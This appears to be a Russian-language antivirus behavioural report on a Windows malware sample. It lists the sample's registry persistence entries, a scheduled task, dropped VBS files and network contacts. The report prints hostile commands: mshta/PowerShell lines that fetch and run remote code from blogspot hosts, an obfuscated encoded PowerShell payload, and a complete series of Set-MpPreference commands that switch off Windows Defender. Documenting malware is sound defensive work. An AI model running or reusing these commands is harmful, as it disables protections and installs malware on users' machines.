Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'phulihoja' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).cutona)|IEX"", 0 : window.clo...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'dkkkksakdosexography' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%1230948@bublicamukajuka.blogs...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/2...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'nunukhaoo' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'phulihoja' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).btfee)|IEX"", 0 : window.clos...
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\tutipajikhana
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
блокирует:
- Средство контроля пользовательских учетных записей (UAC)
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im Excel.exe
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' HTTp://j.#p/asdimawxiwmawidwwdkiiwnawij
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableScriptScanning $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIOAVProtection $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBlockAtFirstSeen $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBehaviorMonitoring $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56*...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SevereThreatDefaultAction 6
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -LowThreatDefaultAction 6
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -ModerateThreatDefaultAction 6
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -HighThreatDefaultAction 6 -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -MAPSReporting 0
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SubmitSamplesConsent 2
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_compiler.exe
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\siggiaw.vbs
- C:\users\public\1.txt
- C:\users\public\bin.vbs
Удаляет следующие файлы
- C:\users\public\siggiaw.vbs
Сетевая активность
Подключается к
- 'j.#p':80
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
- 'ia#####8.us.archive.org':443
- 'cr#.#odaddy.com':80
- 'ia#####6.us.archive.org':443
TCP
- 'tu#########achodamarunmain.blogspot.com':443
- 'bl##ger.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
- 'ia#####8.us.archive.org':443
- 'ia#####6.us.archive.org':443
UDP
- DNS ASK j.#p
- DNS ASK tu#########achodamarunmain.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK go#####analytics.com
- DNS ASK fo###.gstatic.com
- DNS ASK ia#####8.us.archive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK ia#####6.us.archive.org
Другое
Ищет следующие окна
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\SiggiaW.vbs"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\bin.vbs"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\bin.vbs" /elevate
- '<SYSTEM32>\cmd.exe' /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW....' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -HighThreatDefaultAction 6 -Force' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -ModerateThreatDefaultAction 6' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -LowThreatDefaultAction 6' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SevereThreatDefaultAction 6' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56*...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBehaviorMonitoring $true' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIOAVProtection $true' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -MAPSReporting 0' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableScriptScanning $true' (со скрытым окном)
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).btfee)|IEX' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).cutona)|IEX' (со скрытым окном)
- '<SYSTEM32>\taskkill.exe' /f /im Excel.exe' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://12#############@mylundisfarbigthenyouthink.bl...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBlockAtFirstSeen $true' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SubmitSamplesConsent 2' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW....
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://12#############@mylundisfarbigthenyouthink.bl...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).cutona)|IEX
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).btfee)|IEX
- '%WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_compiler.exe'
